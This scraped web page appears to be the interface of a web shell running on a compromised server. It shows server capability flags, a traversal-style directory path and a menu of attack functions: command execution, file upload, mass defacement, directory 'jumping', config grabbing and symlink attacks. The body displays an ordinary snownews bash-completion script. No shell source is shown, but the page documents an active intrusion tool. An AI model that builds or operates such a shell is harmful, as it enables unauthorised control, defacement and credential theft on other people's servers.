OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /../../usr/share/pam/../locale/da/../nn/../so/../../bash-completion/completions/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
# snownews(1) completion -*- shell-script -*- _snownews() { local cur prev words cword _init_completion || return if [[ "$cur" == -* ]]; then # return list of available options COMPREPLY=( $(compgen -W '$(_parse_help "$1")' -- "$cur") ) fi } && complete -F _snownews snownews # ex: filetype=sh